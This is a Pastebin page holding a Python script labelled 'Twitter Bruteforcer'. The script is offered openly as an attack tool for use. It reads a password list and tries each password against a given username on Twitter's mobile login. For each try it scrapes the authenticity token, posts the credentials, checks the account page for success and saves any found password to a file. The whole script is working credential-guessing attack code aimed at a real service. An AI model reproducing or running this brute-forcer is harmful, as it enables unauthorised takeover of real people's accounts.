Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # - - - - - - - - - - - - - - - - - - - - -
- # Twitter Bruteforcer
- # - - - - -
- # Originally from:
- # https://github.com/codingplanets/TwitterBruteforcer
- import requests
- import sys
- import time
- def find_between(s, first, last):
- try:
- start = s.index(first) + len(first)
- end = s.index(last, start)
- return s[start:end]
- except ValueError:
- return ""
- def check_password(username, password):
- # Standard Configuration
- s = requests.Session()
- headers = {
- 'User-Agent': 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1',
- 'Referer': 'https://mobile.twitter.com/login',
- 'Content-Type': 'application/x-www-form-urlencoded'
- }
- login_url = 'https://mobile.twitter.com/login'
- r = s.get(login_url, headers=headers)
- # print(str(r.text))
- # Figure out Payload
- auth_token = find_between(str(r.text), '<input name="authenticity_token" type="hidden" value="', '">')
- # auth_token = find_between(str(r.text), '<input name="authenticity_token" type="hidden" value="', '">')
- #redirect_url = find_between(str(r.text), '<input type="hidden" name="redirect_after_login" value="','">')
- payload = {
- 'authenticity_token': auth_token,
- 'remember_me': '1',
- 'wfa': '1',
- 'redirect_after_login': '/',
- 'session[username_or_email]': username,
- 'session[password]': password
- }
- session_url = 'https://mobile.twitter.com/sessions'
- r = s.post(session_url, headers=headers, data=payload)
- # Password Check
- r = s.get('https://mobile.twitter.com/account')
- return username in r.text
- def check_file(username, filename):
- # Load Password List
- password_list = [line.rstrip('\n') for line in open(filename)]
- i = 0
- for password in password_list:
- i += 1
- print('{0}: Trying "{1}"'.format(i, password))
- if (check_password(username, password)):
- print('Found after {0} tries: Username: "{1}" & Password: "{2}"'.format(i, username, password))
- with open('{0}.txt'.format(username), 'w') as file:
- file.write('Found after {0} tries: Username: "{1}" & Password: "{2}"'.format(i, username, password))
- sys.exit()
- time.sleep(5)
- check_file(sys.argv[1], sys.argv[2])
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement